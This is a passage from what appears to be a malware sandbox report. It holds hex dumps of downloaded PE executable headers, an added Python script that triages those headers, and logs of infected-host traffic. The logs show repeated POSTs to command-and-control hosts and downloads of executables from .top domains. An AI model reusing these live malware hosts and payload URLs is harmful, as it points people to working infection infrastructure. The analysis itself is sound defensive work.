00 1c
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 13:31:02 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 13:30:03 GMTETag: "d6200-5cf7dd31ce3c9"Accept-Ranges: bytesContent-Length: 877056Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed ff a0 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 e4 0b 00 00 c0 70 02 00 00 00 00 20 e3 09 00 00 10 00 00 00 00 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 7c 02 00 04 00 00 6a 61 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 e7 0b 00 64 00 00 00 00 80 7b 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 7b 02 94 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 0b 00 00 10 00 00 00 e4 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 00 0c 00 00 16 00 00 00 e8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 
75 63 69 00 00 00 e5 02 00 00 00 70 7b 02 00 04 00 00 00 fe 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 80 7b 02 00 3c 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 c0 7b 02 00 24 01 00 00 3e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 13:32:12 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
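All four responses above are served as application/octet-stream with a body that starts with the MZ/PE magic, which is what "Downloads executable code via HTTP" keys on. The Python below is an added example, not code from the report: it decodes the DOS header, COFF header and section table from the first response body (the 345600-byte file served at 13:29:51 GMT) using the bytes exactly as they appear in that Data Raw dump, and applies the static checks that correspond to the "PE file contains sections with non-standard names" and "Detected unpacking" signatures. The virtual-to-raw size ratio threshold and the list of section names treated as standard are my choices.

```python
import struct
from datetime import datetime, timezone

# Header region (first 0x2A8 bytes) of the first response body above, copied
# from the report's "Data Raw" dump. Offsets in the comments are file offsets.
PAYLOAD_HEAD = bytes.fromhex(
    "4d5a90000300000004000000ffff0000 b8000000000000004000000000000000"  # 0x000 IMAGE_DOS_HEADER
    "00000000000000000000000000000000 000000000000000000000000e8000000"  # 0x020 e_lfanew = 0xE8
    "0e1fba0e00b409cd21b8014ccd215468 69732070726f6772616d2063616e6e6f"  # 0x040 DOS stub
    "742062652072756e20696e20444f5320 6d6f64652e0d0d0a2400000000000000"  # 0x060
    "b5edf73ef18c996df18c996df18c996d 9efa326ddd8c996d9efa076dd38c996d"  # 0x080 Rich header
    "9efa336d718c996df8f40a6df88c996d f18c986d8f8c996d9efa366df08c996d"  # 0x0A0
    "9efa036df08c996d9efa046df08c996d 52696368f18c996d0000000000000000"  # 0x0C0
    "0000000000000000504500004c010500 830c035f0000000000000000e0000201"  # 0x0E0 "PE\0\0" + COFF header
    "0b010a0000c8030000c0700200000000 70c701000010000000e0030000004000"  # 0x100 optional header (PE32)
    "00100000000200000500010000000000 050001000000000000d0740200040000"  # 0x120
    "b8a10500020000810000100000100000 00001000001000000000000010000000"  # 0x140
    "000000000000000034cc030064000000 00607302003c00000000000000000000"  # 0x160 data directories
    "000000000000000000a07302881b0000 301200001c0000000000000000000000"  # 0x180
    "00000000000000000000000000000000 f0bb0100400000000000000000000000"  # 0x1A0
    "00100000dc0100000000000000000000 00000000000000000000000000000000"  # 0x1C0
    "2e7465787400000068c7030000100000 00c80300000400000000000000000000"  # 0x1E0 section table
    "00000000200000602e64617461000000 c8696f0200e003000016000000cc0300"  # 0x200
    "000000000000000000000000400000c0 2e78656d75000000e502000000507302"  # 0x220
    "0004000000e203000000000000000000 00000000400000c02e72737263000000"  # 0x240
    "003c000000607302003c000000e60300 00000000000000000000000040000040"  # 0x260
    "2e72656c6f630000f023010000a07302 00240100002204000000000000000000"  # 0x280
    "0000000040000042"                                                   # 0x2A0
)

# Names a linker produces by default; anything else is worth a look (assumed list).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", ".textbss"}


def parse_pe_head(buf: bytes) -> dict:
    """Decode the DOS header, COFF file header and section table of a PE image.

    Raises ValueError if a magic value is missing or the buffer ends before the
    section table does; either way the download is not a plain PE and needs a
    look of its own.
    """
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24                     # optional header follows the 24-byte NT headers
    magic = struct.unpack_from("<H", buf, opt)[0]
    sections = []
    for i in range(nsec):
        off = opt + opt_size + i * 40       # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(buf):
            raise ValueError("section table truncated")
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", buf, off)
        sec_chars = struct.unpack_from("<I", buf, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": rawsize, "raw_ptr": rawptr,
                         "characteristics": sec_chars})
    return {"machine": machine, "is_pe32": magic == 0x10B, "num_sections": nsec,
            "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc),
            "characteristics": chars, "sections": sections}


def raw_extent(info: dict) -> int:
    """Highest file offset covered by any section; compare with Content-Length."""
    return max(s["raw_ptr"] + s["raw_size"] for s in info["sections"])


def triage_flags(info: dict) -> list:
    """Cheap static checks that map onto the report's own signatures."""
    flags = []
    for s in info["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            flags.append(f"non-standard section name {s['name']!r}")
        # Virtual size far beyond on-disk size: the loader reserves memory that is
        # filled at run time, the usual footprint of an unpacking stub.
        if s["raw_size"] and s["virtual_size"] > 64 * s["raw_size"]:
            flags.append(f"{s['name']} virtual size 0x{s['virtual_size']:X} vs raw 0x{s['raw_size']:X}")
        if (s["characteristics"] & 0xA0000000) == 0xA0000000:   # IMAGE_SCN_MEM_WRITE | MEM_EXECUTE
            flags.append(f"{s['name']} is writable and executable")
    return flags


if __name__ == "__main__":
    info = parse_pe_head(PAYLOAD_HEAD)
    print(f"machine=0x{info['machine']:X} sections={info['num_sections']} built={info['timestamp']:%Y-%m-%d %H:%M:%S}Z")
    for s in info["sections"]:
        print(f"  {s['name']:8s} vsize=0x{s['virtual_size']:08X} raw=0x{s['raw_size']:06X}@0x{s['raw_ptr']:06X} chars=0x{s['characteristics']:08X}")
    print("raw extent:", raw_extent(info), "flags:", triage_flags(info))
```

On this input the parser returns five sections (.text, .data, .xemu, .rsrc, .reloc), an i386 PE32 built 2020-07-06, and a .data section whose 0x26F69C8-byte virtual size is backed by only 0x1600 bytes on disk; the section extents end at 0x54600 = 345600 bytes, which equals the response's Content-Length, so the download is the complete file rather than a truncated stage. The 602112- and 877056-byte responses above carry the identical Rich header and the same oversized .data section under different throwaway names (.malajew and .vuci), so the parser flags all three the same way; the 916735-byte file from the nginx host declares 18 sections including /4, /19 and /31, a layout typical of a GNU (MinGW) link and a different toolchain altogether.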
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49829 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bkhtxo.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 193 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qucostkxtw.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 204 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kslrhwirq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 159 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vbyddwsgl.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 247 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ckkawpd.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 277 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qjhggbh.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 304 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yilaxxc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 275 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mlylmiecm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 354 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xquhxc.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 134 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lnvqewf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 367 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xpqaga.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 303 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nxvperioa.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 187 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kclljmjl.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 364 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ifkorrg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 155 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uknlp.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 112 | Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agijcahi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fqyeks.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmpicq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyssomocem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wplogk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuiisjmkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://siawn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvqdkujnt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wogvus.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://alsla.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpoitfpcxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryypml.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifklliaybe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omliatj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikgpguftl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udluixh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbbxr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkukb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kvxhgwiwd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fqytd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqqtfxwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://knanvvmjy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmwfrtbvy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nusurtal4f.net
